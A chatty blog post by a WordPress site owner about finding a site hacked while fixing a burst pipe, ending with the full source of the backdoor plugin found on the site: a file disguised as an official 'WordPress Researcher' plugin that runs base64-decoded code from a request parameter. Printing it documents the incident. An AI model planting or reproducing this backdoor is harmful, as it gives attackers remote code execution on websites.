Why you should know that I fixed a water leak the other day

Generating content for a few busy WordPress web sites, whilst ensuring that the core, plugins and themes are up to date can sometimes be challenging.

One of the key tools in our arsenal is a plugin called Infinite WP. With Infinite WP I can keep all sites linked to it up to date without visiting the WP Admin panel of each individual site. A virtual assistant that doesn’t go on strike or demand a larger slice of the ‘small’ pie every year.

When Infinite WP loses contact with the client plugin installed on individual WordPress sites it throws out a message in the Infinite WP console that goes like this; “Houston we have a problem!” Well, actually not really those words but you get my meaning anyway?

One of my busier sites recently lost comms with the Infinite WP console so like a good little boy off I went to see what could be the problem. At this stage of the conversation you need to know that almost 95% of the content on this particular web site is posted via WordPress’ handy little ‘Press This’ function or via the WordPress App on my Android Tablet so I you will appreciate that I don’t have the WP Admin open all the time.

After surviving many hacking attempts I don’t get that sinking feeling in the pit of my stomach anymore after opening up a web site only to see that it has been hacked. In moments of panic us human beings are prone to blame someone else first rather than just tackle and fix a problem. This is normally when, without thinking, the normal person opens a ticket with tech support who then struggle to translate this new language consisting mostly of four letter words and not much else.

Suffice to say my web site had been a victim of hacker who had placed a plugin in my wp-content plugins folder that had ‘hidden’ all my other plugins (hence the message from Infinite WP) and placed some dodgy code on many pages.

It just so happens that I am hosted by a host (geddit?) of nice guys who have vast experience in this business. It also so happens that the universe decided that I hadn’t had enough troubles for one day so the water pipe running across one of my roofs decided to burst at the same time.

What did I do?

In the old days I would have ignored the water leak and concentrated on fixing the hack.

The new me though handed my problem over to Edward and Robert at Serv Hosting – they looked for a clean backup and restored the site as well as a clean up to date database – all in less time than it took me to fix my water leak.

The backdoor plugin was called research_plugin.php and contained a backdoor code hooked up to the theme.

<?php

/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later – http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4

Copyright 2013  wordpressdotorg

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/

function research_plugin()
{
if (isset($_REQUEST[‘CSSl’]))
{
eval(base64_decode($_REQUEST[‘CSSl’]));
}
return;
}

add_action(‘after_setup_theme’, ‘research_plugin’);
?>

Speak Your Mind